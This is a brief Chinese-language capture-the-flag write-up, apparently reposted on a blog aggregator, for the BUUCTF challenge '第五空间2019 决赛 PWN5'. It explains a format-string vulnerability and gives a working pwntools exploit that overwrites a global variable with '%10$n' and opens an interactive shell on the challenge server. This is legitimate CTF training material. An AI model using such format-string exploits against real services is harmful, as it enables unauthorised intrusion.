[BUUCTF-pwn]——[第五空间2019 决赛]PWN5
生活随笔
收集整理的這篇文章主要介紹了
[BUUCTF-pwn]——[第五空间2019 决赛]PWN5
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[BUUCTF-pwn]——[第五空間2019 決賽]PWN5
- 題目地址:https://buuoj.cn/challenges#[第五空間2019%20決賽]PWN5
- 題目:
這是一道格式化字符串的題,給大家講解下
checksec一下看看, 開啟了canary保護, 基本開啟這個保護都會用到格式化字符串的漏洞。
在IDA中
利用pwndbg看看, 偏移是多少。 0xa也就是 10
思路
利用格式化字符串漏洞, 修改unk_804C044的值, 并且輸入相等的值
exploit
from pwn import * p=remote('node3.buuoj.cn',26506)unk_804C044_addr=0x0804C044payload=p32(unk_804C044_addr)+'%10$n' p.sendline(payload)p.sendline('4') p.interactive()總結
以上是生活随笔為你收集整理的[BUUCTF-pwn]——[第五空间2019 决赛]PWN5的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [攻防世界 pwn]——pwn-200
- 下一篇: [攻防世界 pwn]——pwn-100